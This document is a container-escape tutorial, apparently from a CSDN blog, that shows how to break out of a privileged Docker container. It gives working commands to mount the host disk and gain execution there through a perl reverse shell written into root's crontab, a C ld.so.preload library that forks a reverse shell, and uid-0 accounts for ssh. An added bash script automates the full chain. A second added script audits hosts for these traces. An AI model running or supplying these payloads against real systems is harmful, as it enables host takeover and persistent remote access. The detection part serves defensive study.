Container Escape All In One

Improperly configured capabilities (CAP)

privileged: privilege escalation out of a privileged container

Test environment configuration

docker run -it --privileged ubuntu:18.04

In a real environment

If CapEff in /proc/1/status is the all-ones value for the kernel's capability set, the container holds every capability: it is a privileged container and can be escaped with the steps below. 0000003fffffffff is that value on kernels with 38 capabilities (before 5.8); newer kernels show a longer all-ones value such as 000001ffffffffff, so compare against /proc/sys/kernel/cap_last_cap or decode the value with capsh --decode=<value> rather than memorising the constant. For comparison, a default (non-privileged) Docker container shows 00000000a80425fb. Note that --privileged also exposes the host's block devices in /dev and drops the seccomp and AppArmor confinement, which is what makes the mount below possible.

cat /proc/1/status|grep CapEff
CapEff:	0000003fffffffff

Escape method: mount the host's root filesystem. fdisk can list the host's disks because --privileged exposes its block devices in the container's /dev; /dev/vda1 below is an example, use whichever partition fdisk reports as the host root (on LVM hosts it is a /dev/mapper/* volume instead).

fdisk -l|grep Linux
mkdir /host
mount /dev/vda1 /host
chroot /host

At this point the escape is only at the filesystem level: the host's files can be read and written through /host, but you are still inside the container's PID and network namespaces and nothing is executing in the host's context yet. To get execution on the host, plant something the host will run on its own, using one of the methods below (all paths in them are host paths, i.e. as seen inside the chroot, or prefixed with /host if you skip the chroot).

Scheduled tasks (cron)

/var/spool/cron/crontabs/ on Ubuntu and Debian
ls -la /var/spool/cron/crontabs

If the directory exists, the host uses this layout and we can write root's crontab directly:

echo $'*/1 * * * * perl -e \'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' >> /var/spool/cron/crontabs/root
chmod 600 /var/spool/cron/crontabs/root

Replace 127.0.0.1 and 8080 with your own listener, which must be reachable from the host, then listen (for example nc -lvnp 8080) and wait: the host's cron daemon runs the entry every minute and the shell connects back in the host's context. The file has to be owned by root with mode 600, otherwise cron skips it (it logs BAD FILE MODE), which is what the chmod is for. The $'...' quoting needs bash; if the chroot drops you into dash (/bin/sh on Debian), start bash first.

/var/spool/cron on CentOS and RHEL
ls -la /var/spool/cron/

If this directory exists (and crontabs/ does not), the host uses the cronie layout and the same entry goes into /var/spool/cron/root:

echo $'*/1 * * * * perl -e \'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'' >> /var/spool/cron/root
chmod 600 /var/spool/cron/root
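The chain above (check CapEff, mount the host root, drop the crontab) as one script of functions. This is an added example, not code from the original post. It assumes bash with GNU coreutils/awk and util-linux fdisk, and a listener address you supply (the 10.0.0.5:4444 in the usage comment is a placeholder). It goes one step beyond the text: full_capset checks CapEff against the kernel's own cap_last_cap instead of a hard-coded constant, so it works on any kernel version, and install_cron probes for whichever cron layout the host has.

```bash
#!/bin/bash
# Added example, not code from the original post: the privileged-container
# escape as reusable functions. Assumes bash, GNU coreutils/awk and util-linux
# fdisk; the listener address is whatever you pass in (no default).
set -u

# True when the CapEff hex value has every bit 0..cap_last_cap set, i.e. the
# full capability set that --privileged grants. Checking against the kernel's
# own cap_last_cap works on any kernel, unlike hard-coding 0000003fffffffff
# (which is only the 38-capability set of kernels before 5.8).
full_capset() {            # $1 = CapEff hex string, $2 = cap_last_cap
    local eff=$(( 0x$1 ))
    local mask=$(( (1 << ($2 + 1)) - 1 ))
    [ "$eff" -eq "$mask" ]
}

# Extract CapEff from a /proc/<pid>/status-style file.
capeff_from_status() {     # $1 = path to a status file
    awk '/^CapEff:/ { print $2 }' "$1"
}

# Locate the per-user crontab spool under a root prefix: Debian/Ubuntu use
# /var/spool/cron/crontabs, RHEL/CentOS use /var/spool/cron.
cron_spool() {             # $1 = root prefix ("" once chrooted, "/host" before)
    local root=${1:-}
    if [ -d "$root/var/spool/cron/crontabs" ]; then
        echo "$root/var/spool/cron/crontabs"
    elif [ -d "$root/var/spool/cron" ]; then
        echo "$root/var/spool/cron"
    else
        return 1
    fi
}

# The once-a-minute perl reverse shell from the post, with the listener
# address filled in instead of the 127.0.0.1:8080 placeholder.
cron_line() {              # $1 = listener ip, $2 = listener port
    printf '*/1 * * * * perl -e %s\n' \
        "'use Socket;\$i=\"$1\";\$p=$2;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
}

# Append the entry to root's crontab and give it the ownership and mode cron
# insists on (root, 0600; anything else is skipped with "BAD FILE MODE").
install_cron() {           # $1 = root prefix, $2 = ip, $3 = port; prints the file written
    local dir f
    dir=$(cron_spool "$1") || { echo "no cron spool under '$1'" >&2; return 1; }
    f="$dir/root"
    cron_line "$2" "$3" >> "$f"
    chmod 600 "$f"
    chown 0:0 "$f" 2>/dev/null || echo "warning: chown failed (not root?)" >&2
    echo "$f"
}

# Whole chain, run as root inside the container: confirm the full capability
# set, mount the first Linux partition fdisk reports at /host (adjust if the
# host root is elsewhere, e.g. on LVM) and plant the crontab through /host
# without chrooting.
escape() {                 # $1 = listener ip, $2 = listener port
    local last eff dev
    last=$(cat /proc/sys/kernel/cap_last_cap)
    eff=$(capeff_from_status /proc/self/status)
    full_capset "$eff" "$last" || { echo "CapEff $eff is not the full set, not privileged" >&2; return 1; }
    dev=$(fdisk -l 2>/dev/null | awk '$1 ~ /^\/dev\// && /Linux/ && !/swap/ { print $1; exit }')
    [ -n "$dev" ] || { echo "no host Linux partition found" >&2; return 1; }
    mkdir -p /host && mount "$dev" /host || return 1
    install_cron /host "$1" "$2"
}

# Usage:  escape 10.0.0.5 4444      (then `nc -lvnp 4444` on 10.0.0.5)
```

Passing "" as the root prefix makes install_cron work from inside the chroot exactly as the manual steps do; passing /host skips the chroot, which keeps your own shell and tools available.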

ld.so.preload

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* Listener to connect back to; replace with your own address. */
int tcp_port = 8080;
char *ip = "127.0.0.1";

/* Destructor, so it runs when a process that loaded this library exits,
 * not when it starts. Remove the preload entry first so only this one
 * process is hooked, then fork a child that connects back and gives
 * /bin/bash the socket as stdin/stdout/stderr. */
__attribute__((destructor)) void test(){
	remove("/etc/ld.so.preload");
	int pid;
	if((pid=fork())==0){
		int fd;
		struct sockaddr_in addr;
		addr.sin_family = AF_INET;
		addr.sin_port = htons(tcp_port);
		addr.sin_addr.s_addr = inet_addr(ip);
		fd = socket(AF_INET, SOCK_STREAM, 0);
		connect(fd, (struct sockaddr*)&addr, sizeof(addr));
		dup2(fd, 0);
		dup2(fd, 1);
		dup2(fd, 2);
		system("/bin/bash");
		_exit(0); /* do not let the child continue the parent's exit sequence */
	}
}
gcc -shared -fPIC evil.c -o evil.so

Build it for the host's architecture and libc (the container's toolchain is fine if they match), then copy evil.so to the host's /tmp, i.e. /host/tmp before the chroot or /tmp inside it, because the path written to ld.so.preload is resolved by the host's loader:

echo '/tmp/evil.so' >/etc/ld.so.preload

From then on the host's dynamic loader preloads evil.so into every new dynamically linked process, and the destructor fires when that process exits: the first one to do so deletes /etc/ld.so.preload and forks the reverse shell, so the hook triggers once and leaves little trace. This is quiet, but still passive: nothing happens until the host starts a new process, for example an operator logging in or a cron job running. Two caveats: a library that the host's loader cannot load (wrong architecture or libc) makes ld.so print an error at every process start, which is very noisy, and the callback address must be reachable from the host.

ssh

Once the filesystem-level escape is done, scan the host from the container's network namespace; 172.17.0.1 is the host's address on the default docker0 bridge. The "succeeded" string is what the OpenBSD netcat prints; other variants word it differently (nc.traditional says "open"), so adjust the grep.

nc -nvz -w2  172.17.0.1 1-65535 2>&1|grep succeeded

If the host runs sshd, create an account through the chroot, which writes to the host's /etc/passwd and /etc/shadow, and then ssh to the host as that user:

adduser test
passwd test

You can also edit /etc/passwd and set the new user's uid to 0 so the login lands as root. Keep in mind that sshd applies PermitRootLogin to any uid-0 account, not just the name root, so on a host where root login over ssh is disabled that login is refused and you have to keep the normal uid.
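The three persistence methods above (ld.so.preload, spool crontabs, uid-0 accounts) each leave a host-side artefact, and a practitioner cleaning up after a test or hunting for the technique wants to check for all of them at once. The following audit is an added example, not code from the original post; it assumes bash, GNU grep, awk and sed, and is pointed at "" for the live host or at the mount point of an image. The reverse-shell patterns it greps for are a heuristic of my own, not a definitive signature.

```bash
#!/bin/bash
# Added example, not code from the original post: a host-side audit for the
# traces the persistence methods above leave behind. Assumes bash, GNU grep,
# awk and sed; pass "" for the live host or a mounted image's root as prefix.
set -u

# /etc/ld.so.preload: the loader injects every object listed there into every
# new dynamically linked process, so any entry deserves a look; one under a
# world-writable directory like /tmp is an obvious implant.
audit_preload() {          # $1 = root prefix
    local f="$1/etc/ld.so.preload" lib
    [ -s "$f" ] || return 0
    while IFS= read -r lib || [ -n "$lib" ]; do
        [ -n "$lib" ] || continue
        case "$lib" in
            /tmp/*|/var/tmp/*|/dev/shm/*) printf 'PRELOAD suspicious (temp dir): %s\n' "$lib" ;;
            *) printf 'PRELOAD entry: %s\n' "$lib" ;;
        esac
    done < "$f"
}

# Spool crontabs in both layouts whose entries look like a reverse shell
# (heuristic patterns: perl Socket, bash /dev/tcp, netcat -e, bash -i).
audit_cron() {             # $1 = root prefix
    local dir f
    for dir in "$1/var/spool/cron/crontabs" "$1/var/spool/cron"; do
        [ -d "$dir" ] || continue
        for f in "$dir"/*; do
            [ -f "$f" ] || continue
            grep -nE 'inet_aton|use Socket|/dev/tcp/|exec\("/bin/sh|bash -i|\bnc\b.* -e ' "$f" |
                sed "s|^|CRON $f:|"
        done
    done
}

# /etc/passwd: every uid-0 account that is not root (the "change the test uid
# to 0" trick), plus duplicate root entries.
audit_uid0() {             # $1 = root prefix
    local f="$1/etc/passwd"
    [ -f "$f" ] || return 0
    awk -F: '$3 == 0 && $1 != "root" { print "PASSWD uid-0 account: " $1 }
             $1 == "root" && ++seen > 1 { print "PASSWD duplicate root entry" }' "$f"
}

# Run all three checks; one finding per output line.
audit_root() {             # $1 = root prefix ("" for the live host)
    audit_preload "$1"
    audit_cron "$1"
    audit_uid0 "$1"
}

# Number of findings, usable as a pass/fail indicator in a script.
finding_count() {          # $1 = root prefix
    audit_root "$1" | grep -c . || true
}

# Usage:  audit_root ""          (live host)
#         audit_root /mnt/image  (mounted disk image)
```

The preload check deliberately reports every entry, not only temp-dir ones: a legitimate /etc/ld.so.preload is rare enough on a server that each line should be explained.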


Source: blog.csdn.net/azraelxuemo/article/details/131603382